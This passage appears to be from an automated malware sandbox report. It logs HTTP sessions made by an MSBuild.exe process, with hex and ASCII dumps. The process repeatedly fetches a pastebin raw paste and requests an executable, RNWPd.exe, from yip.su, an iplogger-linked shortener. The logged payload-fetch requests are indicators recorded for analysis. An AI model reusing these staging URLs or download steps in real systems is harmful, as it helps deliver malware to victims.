infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
2024-09-16 19:23:59 UTC	1369	IN	Data Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
2024-09-16 19:23:59 UTC	1369	IN	Data Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
2024-09-16 19:23:59 UTC	1369	IN	Data Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
2024-09-16 19:23:59 UTC	156	IN	Data Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:23:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.6	49799	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:24:04 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:24:04 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:24:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433c0edb5c43bb-EWR
2024-09-16 19:24:04 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:24:04 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:24:04 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:24:04 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:24:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.6	49800	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:24:05 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:24:05 UTC	902	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:24:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:24:05 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:24:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZiYh%2FC3IWiE%2FBfjPeWT7Mmbtpo1fPLmlJoEyMRrgn9UbuzoVPGiujqOIbXy7cvk2OU0HG5lFvwvpQSFhgq9C3KpK65cZopps6%2BglPcIyYXp6e8Db9MMzRQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433c142c187c9f-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:24:05 UTC	467	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:24:05 UTC	1369	IN	Data Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
2024-09-16 19:24:05 UTC	1369	IN	Data Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
2024-09-16 19:24:05 UTC	1369	IN	Data Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
2024-09-16 19:24:05 UTC	1369	IN	Data Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
2024-09-16 19:24:05 UTC	1369	IN	Data Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
2024-09-16 19:24:05 UTC	158	IN	Data Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:24:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.6	49801	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:24:10 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:24:10 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:24:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433c379b65434f-EWR
2024-09-16 19:24:10 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:24:10 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:24:10 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:24:10 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 